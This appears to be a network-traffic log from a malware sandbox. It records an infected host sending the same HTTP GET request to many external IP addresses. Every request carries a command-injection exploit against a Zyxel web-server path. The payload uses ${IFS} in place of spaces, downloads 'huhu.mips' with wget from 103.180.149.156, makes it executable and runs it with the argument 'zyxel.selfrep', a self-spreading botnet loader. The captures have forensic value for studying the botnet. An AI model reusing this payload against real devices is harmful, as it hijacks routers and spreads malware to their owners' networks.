                                                        Feb 2, 2024 06:21:06.881455898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3791192.168.2.144166435.236.110.34443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.881520987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3792192.168.2.144912024.43.215.30443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.881552935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3793192.168.2.1441016207.107.67.24443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.881602049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3794192.168.2.144362449.179.94.40443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.881638050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3795192.168.2.1446704201.100.239.49443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.881669998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3796192.168.2.145749063.242.115.222443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.881692886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3797192.168.2.145910424.185.217.222443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.881735086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3798192.168.2.145517817.6.25.83443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.881762028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3799192.168.2.1442874145.47.185.223443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.881812096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3800192.168.2.1437494188.51.132.208443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.881864071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3801192.168.2.143499034.190.156.246443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.881906033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3802192.168.2.1455278223.168.235.54443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.881933928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3803192.168.2.1455662192.151.33.134443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.881964922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3804192.168.2.1435408191.246.37.62443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.882003069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3805192.168.2.144542258.158.0.149443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.882047892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3806192.168.2.1436872134.217.118.70443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.882088900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3807192.168.2.143548489.65.40.203443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.882138968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3808192.168.2.1460448174.14.186.33443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.882181883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3809192.168.2.1445450203.118.105.155443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.882210970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3810192.168.2.145033012.48.160.152443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.882255077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3811192.168.2.143752046.188.66.233443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.882308006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3812192.168.2.1459932150.211.239.6443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.882344007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3813192.168.2.143751695.77.99.163443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.882389069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3814192.168.2.1450524195.7.1.210443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.882409096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3815192.168.2.143625032.228.230.1443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.882452011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3816192.168.2.1454114159.182.168.80443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.882503986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3817192.168.2.1440586102.187.224.218443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.882534981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3818192.168.2.1448786146.73.175.44443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.882571936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3819192.168.2.1433774132.63.99.69443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.882627010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3820192.168.2.1457370188.74.54.235443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.882664919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3821192.168.2.1434396118.139.121.195443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.882684946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3822192.168.2.1434592187.118.61.115443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.882725954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3823192.168.2.1440052143.247.75.9443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.882771015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3824192.168.2.1441804177.234.4.2443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.882819891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3825192.168.2.144816818.174.173.230443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.882853985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3826192.168.2.1455008102.247.139.69443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.882879972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3827192.168.2.1440020149.72.6.173443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.882929087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3828192.168.2.1450586182.238.75.58443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:06.882970095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3829192.168.2.1459688199.205.56.143443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.882947922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3830192.168.2.143641094.56.35.221443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.883027077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3831192.168.2.1448984112.208.63.82443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.883064032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3832192.168.2.1455518202.224.83.28443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.883119106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3833192.168.2.143294675.205.230.66443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.883152008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3834192.168.2.1447022102.180.91.162443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.883183002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3835192.168.2.1452864209.160.84.2443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.883227110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3836192.168.2.144803036.109.223.164443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.883250952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3837192.168.2.1445174192.212.193.53443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.883308887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3838192.168.2.1434240209.93.24.216443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.883371115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3839192.168.2.145160492.182.7.164443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.883410931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3840192.168.2.1437142100.183.94.2443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.883439064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3841192.168.2.144427813.197.255.200443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.883470058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3842192.168.2.144104084.98.142.164443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.883518934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3843192.168.2.1455660139.148.22.222443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.883548021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3844192.168.2.1436850141.193.243.143443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.883595943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3845192.168.2.143351266.57.171.177443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.883654118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3846192.168.2.1438326211.170.196.167443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.883686066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3847192.168.2.1446470222.18.223.174443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.883732080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3848192.168.2.1447084175.145.126.16443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.883769035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3849192.168.2.1458856223.72.110.127443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.883800030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3850192.168.2.144308462.21.232.233443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.883830070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3851192.168.2.145156453.130.49.78443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.883888960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3852192.168.2.1451626192.25.118.165443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.883913040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3853192.168.2.143858664.119.43.44443
                                                        TimestampBytes transferredDirectionData
